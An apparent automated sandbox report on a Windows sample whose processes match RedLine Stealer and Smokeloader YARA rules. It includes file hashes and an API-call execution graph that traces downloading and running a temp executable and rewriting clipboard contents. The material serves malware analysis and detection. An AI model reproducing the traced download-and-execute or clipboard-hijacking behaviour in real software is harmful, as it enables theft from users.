                                                                                                                                                                                                                            2025-01-12 16:45:34 UTC11186INData Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                            Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>


                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                            Start time:11:45:21
                                                                                                                                                                                                                            Start date:12/01/2025
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\g3toRYa6JE.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\g3toRYa6JE.exe"
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            File size:457'728 bytes
                                                                                                                                                                                                                            MD5 hash:4E7E1578ABC95EC22D6ED2C61BC5ABF9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3872584271.0000000000693000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:11:45:28
                                                                                                                                                                                                                            Start date:12/01/2025
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\26A5.tmp.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\26A5.tmp.exe"
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            File size:403'968 bytes
                                                                                                                                                                                                                            MD5 hash:08494E6A1E788EA3259955A4524FDFEC
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1788938311.00000000005A3000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                            • Detection: 50%, ReversingLabs
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                            Start time:11:45:33
                                                                                                                                                                                                                            Start date:12/01/2025
                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 1012
                                                                                                                                                                                                                            Imagebase:0x570000
                                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:2.2%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:3.7%
                                                                                                                                                                                                                              Signature Coverage:5.7%
                                                                                                                                                                                                                              Total number of Nodes:751
                                                                                                                                                                                                                              Total number of Limit Nodes:21
                                                                                                                                                                                                                              execution_graph 64931 402ba3 RegCreateKeyExW 64932 402bd1 RegSetValueExW 64931->64932 64933 402be5 64931->64933 64932->64933 64934 402bf3 64933->64934 64935 402bea RegCloseKey 64933->64935 64935->64934 64936 78003c 64937 780049 64936->64937 64951 780e0f SetErrorMode SetErrorMode 64937->64951 64942 780265 64943 7802ce VirtualProtect 64942->64943 64945 78030b 64943->64945 64944 780439 VirtualFree 64949 7804be 64944->64949 64950 7805f4 LoadLibraryA 64944->64950 64945->64944 64946 7804e3 LoadLibraryA 64946->64949 64948 7808c7 64949->64946 64949->64950 64950->64948 64952 780223 64951->64952 64953 780d90 64952->64953 64954 780dad 64953->64954 64955 780dbb GetPEB 64954->64955 64956 780238 VirtualAlloc 64954->64956 64955->64956 64956->64942 64957 404b84 64958 404b90 std::_Locinfo::_Locinfo 64957->64958 64963 40fb02 64958->64963 64962 404bb0 std::_Locinfo::_Locinfo collate 64965 40fb07 64963->64965 64966 404b99 64965->64966 64968 40fb23 Concurrency::details::SchedulerBase::AddContext 64965->64968 64987 42ad6e 64965->64987 64994 42f440 7 API calls 2 library calls 64965->64994 64971 4051c6 64966->64971 64995 4285fd RaiseException 64968->64995 64970 4103bc 64972 4051d2 std::_Locinfo::_Locinfo __Cnd_init 64971->64972 64975 4051ea __Mtx_init 64972->64975 65006 40ce28 28 API calls std::_Throw_Cpp_error 64972->65006 64974 405211 64998 4010ea 64974->64998 64975->64974 65007 40ce28 28 API calls std::_Throw_Cpp_error 64975->65007 64981 405260 64982 405275 collate 64981->64982 65009 401128 30 API calls 2 library calls 64981->65009 65010 401109 64982->65010 64986 40529a std::_Locinfo::_Locinfo 64986->64962 64992 433697 std::_Locinfo::_Locinfo_dtor 64987->64992 64988 4336d5 64997 42eab9 20 API calls _Atexit 64988->64997 64990 4336c0 RtlAllocateHeap 64991 4336d3 64990->64991 64990->64992 64991->64965 64992->64988 64992->64990 64996 42f440 7 API calls 2 library calls 64992->64996 64994->64965 64995->64970 64996->64992 64997->64991 65014 40d309 64998->65014 65001 401103 65003 40cee9 65001->65003 65046 42e104 65003->65046 65006->64975 65007->64974 65008 40ce28 28 API calls std::_Throw_Cpp_error 65008->64981 65009->64981 65011 401115 __Mtx_unlock 65010->65011 65012 401122 65011->65012 65378 40ce28 28 API calls std::_Throw_Cpp_error 65011->65378 65012->64986 65018 40d063 65014->65018 65017 40ce28 28 API calls std::_Throw_Cpp_error 65017->65001 65019 40d0b9 65018->65019 65020 40d08b GetCurrentThreadId 65018->65020 65022 40d0e3 65019->65022 65023 40d0bd GetCurrentThreadId 65019->65023 65021 40d096 GetCurrentThreadId 65020->65021 65032 40d0b1 65020->65032 65021->65032 65024 40d17c GetCurrentThreadId 65022->65024 65027 40d103 65022->65027 65025 40d0cc 65023->65025 65024->65025 65026 40d1d3 GetCurrentThreadId 65025->65026 65025->65032 65026->65032 65043 40e925 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65027->65043 65031 4010f6 65031->65001 65031->65017 65036 40f8c5 65032->65036 65033 40d13b GetCurrentThreadId 65033->65025 65034 40d10e __Xtime_diff_to_millis2 65033->65034 65034->65025 65034->65032 65034->65033 65044 40e925 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 65034->65044 65037 40f8d0 IsProcessorFeaturePresent 65036->65037 65038 40f8ce 65036->65038 65040 40f943 65037->65040 65038->65031 65045 40f907 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65040->65045 65042 40fa26 65042->65031 65043->65034 65044->65034 65045->65042 65047 42e111 65046->65047 65048 42e125 65046->65048 65069 42eab9 20 API calls _Atexit 65047->65069 65060 42e0bb 65048->65060 65051 42e116 65070 42a58d 26 API calls _Deallocate 65051->65070 65054 42e13a CreateThread 65056 42e165 65054->65056 65057 42e159 GetLastError 65054->65057 65098 42dfb0 65054->65098 65055 40524d 65055->64981 65055->65008 65072 42e02d 65056->65072 65071 42ea83 20 API calls __dosmaperr 65057->65071 65080 434d1a 65060->65080 65064 42e0d4 65065 42e0f3 65064->65065 65066 42e0db GetModuleHandleExW 65064->65066 65067 42e02d __Thrd_start 22 API calls 65065->65067 65066->65065 65068 42e0fd 65067->65068 65068->65054 65068->65056 65069->65051 65070->65055 65071->65056 65073 42e03a 65072->65073 65074 42e05e 65072->65074 65075 42e040 CloseHandle 65073->65075 65076 42e049 65073->65076 65074->65055 65075->65076 65077 42e058 65076->65077 65078 42e04f FreeLibrary 65076->65078 65079 43345a _free 20 API calls 65077->65079 65078->65077 65079->65074 65081 434d27 65080->65081 65082 434d67 65081->65082 65083 434d52 HeapAlloc 65081->65083 65087 434d3b std::_Locinfo::_Locinfo_dtor 65081->65087 65096 42eab9 20 API calls _Atexit 65082->65096 65084 434d65 65083->65084 65083->65087 65086 42e0cb 65084->65086 65089 43345a 65086->65089 65087->65082 65087->65083 65095 42f440 7 API calls 2 library calls 65087->65095 65090 43348e __dosmaperr 65089->65090 65091 433465 HeapFree 65089->65091 65090->65064 65091->65090 65092 43347a 65091->65092 65097 42eab9 20 API calls _Atexit 65092->65097 65094 433480 GetLastError 65094->65090 65095->65087 65096->65086 65097->65094 65099 42dfbc _Atexit 65098->65099 65100 42dfc3 GetLastError ExitThread 65099->65100 65101 42dfd0 65099->65101 65114 431eca GetLastError 65101->65114 65103 42dfd5 65134 435561 65103->65134 65106 42dfeb 65141 401169 65106->65141 65115 431ee0 65114->65115 65116 431ee6 65114->65116 65149 435101 11 API calls 2 library calls 65115->65149 65118 434d1a __Tolower 20 API calls 65116->65118 65119 431f35 SetLastError 65116->65119 65121 431ef8 65118->65121 65119->65103 65120 431f00 65124 43345a _free 20 API calls 65120->65124 65121->65120 65150 435157 11 API calls 2 library calls 65121->65150 65123 431f15 65123->65120 65125 431f1c 65123->65125 65126 431f06 65124->65126 65151 431d3c 20 API calls __Tolower 65125->65151 65128 431f41 SetLastError 65126->65128 65152 42df6d 167 API calls 2 library calls 65128->65152 65129 431f27 65131 43345a _free 20 API calls 65129->65131 65133 431f2e 65131->65133 65132 431f4d 65133->65119 65133->65128 65135 435586 65134->65135 65136 43557c 65134->65136 65153 434e83 5 API calls 2 library calls 65135->65153 65138 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65136->65138 65139 42dfe0 65138->65139 65139->65106 65148 435494 10 API calls 2 library calls 65139->65148 65140 43559d 65140->65136 65154 4057f6 65141->65154 65167 40155a Sleep 65141->65167 65142 401173 65145 42e189 65142->65145 65346 42e064 65145->65346 65147 42e196 65148->65106 65149->65116 65150->65123 65151->65129 65152->65132 65153->65140 65155 405802 std::_Locinfo::_Locinfo 65154->65155 65156 4010ea std::_Cnd_initX 35 API calls 65155->65156 65157 405817 __Cnd_signal 65156->65157 65160 40582f 65157->65160 65213 40ce28 28 API calls std::_Throw_Cpp_error 65157->65213 65159 401109 std::_Cnd_initX 28 API calls 65161 405838 65159->65161 65160->65159 65169 4029ea InternetOpenW 65161->65169 65185 4016df 65161->65185 65164 40583f std::_Locinfo::_Locinfo collate 65164->65142 65168 4016d5 65167->65168 65170 402b92 65169->65170 65171 402a1d InternetOpenUrlW 65169->65171 65174 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65170->65174 65171->65170 65172 402a33 GetTempPathW GetTempFileNameW 65171->65172 65214 42a87e 65172->65214 65176 402ba1 65174->65176 65206 40e761 65176->65206 65177 402b81 InternetCloseHandle InternetCloseHandle 65177->65170 65178 402a9e Hash 65179 402ab6 InternetReadFile WriteFile 65178->65179 65180 402af6 CloseHandle 65178->65180 65179->65178 65216 402956 65180->65216 65183 402b21 ShellExecuteExW 65183->65177 65184 402b68 WaitForSingleObject CloseHandle 65183->65184 65184->65177 65324 40fddc 65185->65324 65187 4016eb Sleep 65325 40cc06 65187->65325 65190 40cc06 28 API calls 65191 401711 65190->65191 65192 40171b OpenClipboard 65191->65192 65193 401943 Sleep 65192->65193 65194 40172b GetClipboardData 65192->65194 65193->65192 65195 40173b GlobalLock 65194->65195 65196 40193d CloseClipboard 65194->65196 65195->65196 65200 401748 _strlen 65195->65200 65196->65193 65197 40cbbd 28 API calls std::system_error::system_error 65197->65200 65198 40cc06 28 API calls 65198->65200 65200->65196 65200->65197 65200->65198 65201 4018d2 EmptyClipboard GlobalAlloc 65200->65201 65329 402e5c 167 API calls 2 library calls 65200->65329 65331 40ca9c 26 API calls _Deallocate 65200->65331 65201->65200 65203 4018eb GlobalLock 65201->65203 65330 426980 65203->65330 65205 401905 GlobalUnlock SetClipboardData GlobalFree 65205->65200 65337 40dee0 65206->65337 65211 40e806 65211->65164 65212 40e778 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65344 40deec LeaveCriticalSection std::_Lockit::~_Lockit 65212->65344 65213->65160 65215 402a6c CreateFileW 65214->65215 65215->65177 65215->65178 65217 402981 _wcslen Hash 65216->65217 65226 42b444 65217->65226 65221 4029ae 65248 404329 65221->65248 65224 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65225 4029e8 65224->65225 65225->65177 65225->65183 65252 42b0f6 65226->65252 65229 402819 65230 402828 std::_Locinfo::_Locinfo 65229->65230 65278 4032d3 65230->65278 65232 40283c 65294 403b81 65232->65294 65234 402850 65235 402862 65234->65235 65236 40287e 65234->65236 65321 403290 167 API calls 65235->65321 65300 403108 65236->65300 65239 40288b 65303 403c16 65239->65303 65241 40289d 65313 403cb8 65241->65313 65243 4028ba 65245 404329 26 API calls 65243->65245 65244 402875 std::ios_base::_Ios_base_dtor std::_Locinfo::_Locinfo 65244->65221 65246 4028d9 65245->65246 65322 403290 167 API calls 65246->65322 65249 404331 65248->65249 65250 4029da 65248->65250 65323 40cc8c 26 API calls 2 library calls 65249->65323 65250->65224 65253 42b123 65252->65253 65254 42b132 65253->65254 65255 42b14a 65253->65255 65267 42b127 65253->65267 65256 42eab9 __dosmaperr 20 API calls 65254->65256 65257 42a737 __fassign 162 API calls 65255->65257 65258 42b137 65256->65258 65260 42b155 65257->65260 65261 42a58d __fassign 26 API calls 65258->65261 65259 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65262 40299a 65259->65262 65263 42b160 65260->65263 65264 42b2f7 65260->65264 65261->65267 65262->65229 65266 42b208 WideCharToMultiByte 65263->65266 65270 42b16b 65263->65270 65275 42b1a5 WideCharToMultiByte 65263->65275 65265 42b324 WideCharToMultiByte 65264->65265 65268 42b302 65264->65268 65265->65268 65266->65270 65271 42b233 65266->65271 65267->65259 65268->65267 65272 42eab9 __dosmaperr 20 API calls 65268->65272 65270->65267 65274 42eab9 __dosmaperr 20 API calls 65270->65274 65271->65270 65273 42b23c GetLastError 65271->65273 65272->65267 65273->65270 65277 42b24b 65273->65277 65274->65267 65275->65270 65276 42b264 WideCharToMultiByte 65276->65268 65276->65277 65277->65267 65277->65268 65277->65276 65279 4032df std::_Locinfo::_Locinfo 65278->65279 65280 404672 167 API calls 65279->65280 65281 40330b 65280->65281 65282 404843 167 API calls 65281->65282 65283 403334 65282->65283 65284 404582 26 API calls 65283->65284 65285 403343 65284->65285 65286 403388 std::ios_base::_Ios_base_dtor 65285->65286 65287 40ddd9 167 API calls 65285->65287 65288 4033c4 std::_Locinfo::_Locinfo 65286->65288 65290 40c60e 167 API calls 65286->65290 65289 403358 65287->65289 65288->65232 65289->65286 65291 404582 26 API calls 65289->65291 65290->65288 65292 403369 65291->65292 65293 404c0a 167 API calls 65292->65293 65293->65286 65295 403b8d std::_Locinfo::_Locinfo 65294->65295 65296 4042a5 167 API calls 65295->65296 65297 403b99 65296->65297 65298 403bbd std::_Locinfo::_Locinfo 65297->65298 65299 4034f1 167 API calls 65297->65299 65298->65234 65299->65298 65301 40434c 28 API calls 65300->65301 65302 403122 Hash 65301->65302 65302->65239 65304 403c22 std::_Locinfo::_Locinfo 65303->65304 65305 40c60e 167 API calls 65304->65305 65306 403c45 65305->65306 65307 4042a5 167 API calls 65306->65307 65308 403c4f 65307->65308 65309 403c92 std::_Locinfo::_Locinfo 65308->65309 65312 4034f1 167 API calls 65308->65312 65309->65241 65310 403c70 65310->65309 65311 4046c0 167 API calls 65310->65311 65311->65309 65312->65310 65314 403cc4 __EH_prolog3_catch 65313->65314 65315 4042a5 167 API calls 65314->65315 65317 403cdd 65315->65317 65316 4046c0 167 API calls 65319 403d66 std::_Locinfo::_Locinfo 65316->65319 65318 403d0d 65317->65318 65320 403695 40 API calls 65317->65320 65318->65316 65319->65243 65320->65318 65321->65244 65322->65244 65323->65250 65324->65187 65326 40cc22 _strlen 65325->65326 65332 40cbbd 65326->65332 65328 401704 65328->65190 65329->65200 65330->65205 65331->65200 65333 40cbf0 65332->65333 65334 40cbcc BuildCatchObjectHelperInternal 65332->65334 65333->65334 65336 40cb52 28 API calls 4 library calls 65333->65336 65334->65328 65336->65334 65345 40f220 EnterCriticalSection 65337->65345 65339 40deea 65340 40ce8f GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65339->65340 65341 40cec8 65340->65341 65342 40cebd CloseHandle 65340->65342 65343 40cecc GetCurrentThreadId 65341->65343 65342->65343 65343->65212 65344->65211 65345->65339 65355 431f4e GetLastError 65346->65355 65348 42e073 ExitThread 65350 42e091 65352 42e0a4 65350->65352 65353 42e09d CloseHandle 65350->65353 65352->65348 65354 42e0b0 FreeLibraryAndExitThread 65352->65354 65353->65352 65356 431f6d 65355->65356 65357 431f67 65355->65357 65359 434d1a __Tolower 17 API calls 65356->65359 65361 431fc4 SetLastError 65356->65361 65375 435101 11 API calls 2 library calls 65357->65375 65360 431f7f 65359->65360 65362 431f87 65360->65362 65376 435157 11 API calls 2 library calls 65360->65376 65364 42e06f 65361->65364 65365 43345a _free 17 API calls 65362->65365 65364->65348 65364->65350 65374 4354e6 10 API calls 2 library calls 65364->65374 65367 431f8d 65365->65367 65366 431f9c 65366->65362 65368 431fa3 65366->65368 65369 431fbb SetLastError 65367->65369 65377 431d3c 20 API calls __Tolower 65368->65377 65369->65364 65371 431fae 65372 43345a _free 17 API calls 65371->65372 65373 431fb4 65372->65373 65373->65361 65373->65369 65374->65350 65375->65356 65376->65366 65377->65371 65378->65012 65379 402394 65380 402557 PostQuitMessage 65379->65380 65381 4023a8 65379->65381 65382 402555 65380->65382 65383 4023af DefWindowProcW 65381->65383 65384 4023c6 65381->65384 65383->65382 65384->65382 65385 4029ea 167 API calls 65384->65385 65385->65382 65386 6938cc 65387 693906 65386->65387 65390 693b5e 65387->65390 65391 693b6d 65390->65391 65394 6942fe 65391->65394 65395 694319 65394->65395 65396 694322 CreateToolhelp32Snapshot 65395->65396 65397 69433e Module32First 65395->65397 65396->65395 65396->65397 65398 69434d 65397->65398 65399 693b5d 65397->65399 65401 693fbd 65398->65401 65402 693fe8 65401->65402 65403 693ff9 VirtualAlloc 65402->65403 65404 694031 65402->65404 65403->65404 65404->65404 65405 432775 65406 43278b 65405->65406 65407 43279d 65406->65407 65409 43d00c 65406->65409 65412 43c9e1 65409->65412 65411 43d027 65411->65407 65413 43c9ed ___BuildCatchObject 65412->65413 65414 43c9fb 65413->65414 65417 43ca34 65413->65417 65430 42eab9 20 API calls _Atexit 65414->65430 65416 43ca00 65431 42a58d 26 API calls _Deallocate 65416->65431 65423 43cfbb 65417->65423 65422 43ca0a __wsopen_s 65422->65411 65433 43f931 65423->65433 65426 43ca58 65432 43ca81 LeaveCriticalSection __wsopen_s 65426->65432 65429 43345a _free 20 API calls 65429->65426 65430->65416 65431->65422 65432->65422 65434 43f954 65433->65434 65435 43f93d 65433->65435 65437 43f973 65434->65437 65438 43f95c 65434->65438 65504 42eab9 20 API calls _Atexit 65435->65504 65508 434f9a 10 API calls 2 library calls 65437->65508 65506 42eab9 20 API calls _Atexit 65438->65506 65440 43f942 65505 42a58d 26 API calls _Deallocate 65440->65505 65442 43f97a MultiByteToWideChar 65445 43f9a9 65442->65445 65446 43f999 GetLastError 65442->65446 65444 43f961 65507 42a58d 26 API calls _Deallocate 65444->65507 65510 433697 21 API calls 3 library calls 65445->65510 65509 42ea83 20 API calls __dosmaperr 65446->65509 65448 43cfd1 65448->65426 65457 43d02c 65448->65457 65451 43f9b1 65452 43f9b8 MultiByteToWideChar 65451->65452 65455 43f9d9 65451->65455 65454 43f9cd GetLastError 65452->65454 65452->65455 65453 43345a _free 20 API calls 65453->65448 65511 42ea83 20 API calls __dosmaperr 65454->65511 65455->65453 65512 43cd8f 65457->65512 65460 43d077 65530 43976e 65460->65530 65461 43d05e 65544 42eaa6 20 API calls _Atexit 65461->65544 65464 43d063 65545 42eab9 20 API calls _Atexit 65464->65545 65465 43d07c 65466 43d085 65465->65466 65467 43d09c 65465->65467 65546 42eaa6 20 API calls _Atexit 65466->65546 65543 43ccfa CreateFileW 65467->65543 65471 43d08a 65547 42eab9 20 API calls _Atexit 65471->65547 65473 43d152 GetFileType 65475 43d1a4 65473->65475 65476 43d15d GetLastError 65473->65476 65474 43d127 GetLastError 65549 42ea83 20 API calls __dosmaperr 65474->65549 65552 4396b7 21 API calls 2 library calls 65475->65552 65550 42ea83 20 API calls __dosmaperr 65476->65550 65477 43d0d5 65477->65473 65477->65474 65548 43ccfa CreateFileW 65477->65548 65481 43d16b CloseHandle 65481->65464 65484 43d194 65481->65484 65483 43d11a 65483->65473 65483->65474 65551 42eab9 20 API calls _Atexit 65484->65551 65485 43d1c5 65487 43d211 65485->65487 65553 43cf0b 169 API calls 3 library calls 65485->65553 65492 43d23e 65487->65492 65554 43caad 167 API calls 4 library calls 65487->65554 65488 43d199 65488->65464 65491 43d237 65491->65492 65493 43d24f 65491->65493 65555 4335bd 29 API calls 2 library calls 65492->65555 65495 43cff9 65493->65495 65496 43d2cd CloseHandle 65493->65496 65495->65429 65556 43ccfa CreateFileW 65496->65556 65498 43d2f8 65499 43d302 GetLastError 65498->65499 65503 43d247 65498->65503 65557 42ea83 20 API calls __dosmaperr 65499->65557 65501 43d30e 65558 439880 21 API calls 2 library calls 65501->65558 65503->65495 65504->65440 65505->65448 65506->65444 65507->65448 65508->65442 65509->65448 65510->65451 65511->65455 65513 43cdb0 65512->65513 65514 43cdca 65512->65514 65513->65514 65566 42eab9 20 API calls _Atexit 65513->65566 65559 43cd1f 65514->65559 65517 43cdbf 65567 42a58d 26 API calls _Deallocate 65517->65567 65519 43ce02 65520 43ce31 65519->65520 65568 42eab9 20 API calls _Atexit 65519->65568 65528 43ce84 65520->65528 65570 42ffcf 26 API calls 2 library calls 65520->65570 65523 43ce26 65569 42a58d 26 API calls _Deallocate 65523->65569 65524 43ce7f 65525 43cefe 65524->65525 65524->65528 65571 42a5ba 11 API calls _Atexit 65525->65571 65528->65460 65528->65461 65529 43cf0a 65531 43977a ___BuildCatchObject 65530->65531 65574 42e3dd EnterCriticalSection 65531->65574 65533 4397a6 65578 43954d 21 API calls 3 library calls 65533->65578 65534 439781 65534->65533 65539 439814 EnterCriticalSection 65534->65539 65542 4397c8 65534->65542 65537 4397f1 __wsopen_s 65537->65465 65538 4397ab 65538->65542 65579 439694 EnterCriticalSection 65538->65579 65540 439821 LeaveCriticalSection 65539->65540 65539->65542 65540->65534 65575 439877 65542->65575 65543->65477 65544->65464 65545->65495 65546->65471 65547->65464 65548->65483 65549->65464 65550->65481 65551->65488 65552->65485 65553->65487 65554->65491 65555->65503 65556->65498 65557->65501 65558->65503 65561 43cd37 65559->65561 65560 43cd52 65560->65519 65561->65560 65572 42eab9 20 API calls _Atexit 65561->65572 65563 43cd76 65573 42a58d 26 API calls _Deallocate 65563->65573 65565 43cd81 65565->65519 65566->65517 65567->65514 65568->65523 65569->65520 65570->65524 65571->65529 65572->65563 65573->65565 65574->65534 65580 42e425 LeaveCriticalSection 65575->65580 65577 43987e 65577->65537 65578->65538 65579->65542 65580->65577 65581 4340fa 65582 434106 ___BuildCatchObject 65581->65582 65583 434112 65582->65583 65584 434129 65582->65584 65615 42eab9 20 API calls _Atexit 65583->65615 65594 42caef EnterCriticalSection 65584->65594 65587 434139 65595 434176 65587->65595 65588 434117 65616 42a58d 26 API calls _Deallocate 65588->65616 65591 434145 65617 43416c LeaveCriticalSection __fread_nolock 65591->65617 65593 434122 __wsopen_s 65594->65587 65596 434184 65595->65596 65597 43419e 65595->65597 65628 42eab9 20 API calls _Atexit 65596->65628 65618 4328f8 65597->65618 65600 434189 65629 42a58d 26 API calls _Deallocate 65600->65629 65601 4341a7 65625 4347c3 65601->65625 65603 434194 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 65603->65591 65606 4342ab 65608 43425e 65606->65608 65609 4342b8 65606->65609 65607 43422f 65607->65608 65610 43424c 65607->65610 65608->65603 65632 43430b 30 API calls 2 library calls 65608->65632 65631 42eab9 20 API calls _Atexit 65609->65631 65630 43448f 31 API calls 4 library calls 65610->65630 65613 434256 65613->65603 65615->65588 65616->65593 65617->65593 65619 432904 65618->65619 65620 432919 65618->65620 65633 42eab9 20 API calls _Atexit 65619->65633 65620->65601 65622 432909 65634 42a58d 26 API calls _Deallocate 65622->65634 65624 432914 65624->65601 65635 434640 65625->65635 65627 4341c3 65627->65603 65627->65606 65627->65607 65628->65600 65629->65603 65630->65613 65631->65603 65632->65603 65633->65622 65634->65624 65636 43464c ___BuildCatchObject 65635->65636 65637 434654 65636->65637 65638 43466c 65636->65638 65670 42eaa6 20 API calls _Atexit 65637->65670 65640 434720 65638->65640 65645 4346a4 65638->65645 65675 42eaa6 20 API calls _Atexit 65640->65675 65641 434659 65671 42eab9 20 API calls _Atexit 65641->65671 65644 434725 65676 42eab9 20 API calls _Atexit 65644->65676 65660 439694 EnterCriticalSection 65645->65660 65648 43472d 65677 42a58d 26 API calls _Deallocate 65648->65677 65649 4346aa 65651 4346e3 65649->65651 65652 4346ce 65649->65652 65661 434745 65651->65661 65672 42eab9 20 API calls _Atexit 65652->65672 65655 434661 __wsopen_s 65655->65627 65656 4346de 65674 434718 LeaveCriticalSection __wsopen_s 65656->65674 65657 4346d3 65673 42eaa6 20 API calls _Atexit 65657->65673 65660->65649 65678 439911 65661->65678 65663 434757 65664 434770 SetFilePointerEx 65663->65664 65665 43475f 65663->65665 65666 434788 GetLastError 65664->65666 65669 434764 65664->65669 65691 42eab9 20 API calls _Atexit 65665->65691 65692 42ea83 20 API calls __dosmaperr 65666->65692 65669->65656 65670->65641 65671->65655 65672->65657 65673->65656 65674->65655 65675->65644 65676->65648 65677->65655 65679 439933 65678->65679 65680 43991e 65678->65680 65684 439958 65679->65684 65695 42eaa6 20 API calls _Atexit 65679->65695 65693 42eaa6 20 API calls _Atexit 65680->65693 65683 439923 65694 42eab9 20 API calls _Atexit 65683->65694 65684->65663 65685 439963 65696 42eab9 20 API calls _Atexit 65685->65696 65688 43992b 65688->65663 65689 43996b 65697 42a58d 26 API calls _Deallocate 65689->65697 65691->65669 65692->65669 65693->65683 65694->65688 65695->65685 65696->65689 65697->65688 65698 402bfa InternetOpenW 65699 402e4b 65698->65699 65700 402c2d Hash 65698->65700 65701 40f8c5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 65699->65701 65710 42deed 65700->65710 65702 402e5a 65701->65702 65705 42deed std::_Locinfo::_Locinfo_dtor 26 API calls 65706 402e0d 65705->65706 65707 42deed std::_Locinfo::_Locinfo_dtor 26 API calls 65706->65707 65708 402e1f InternetOpenUrlW 65707->65708 65708->65699 65709 402e3a InternetCloseHandle InternetCloseHandle 65708->65709 65709->65699 65711 42df0a 65710->65711 65713 42defc 65710->65713 65719 42eab9 20 API calls _Atexit 65711->65719 65713->65711 65716 42df3a 65713->65716 65715 402dff 65715->65705 65716->65715 65721 42eab9 20 API calls _Atexit 65716->65721 65718 42df14 65720 42a58d 26 API calls _Deallocate 65718->65720 65719->65718 65720->65715 65721->65718 65722 40fbfc 65723 40fc08 ___BuildCatchObject 65722->65723 65751 40ffe9 65723->65751 65725 40fc0f 65726 40fd62 65725->65726 65729 40fc39 65725->65729 65772 4104c3 4 API calls 2 library calls 65726->65772 65728 40fd69 65773 42ffb9 28 API calls _Atexit 65728->65773 65737 40fc78 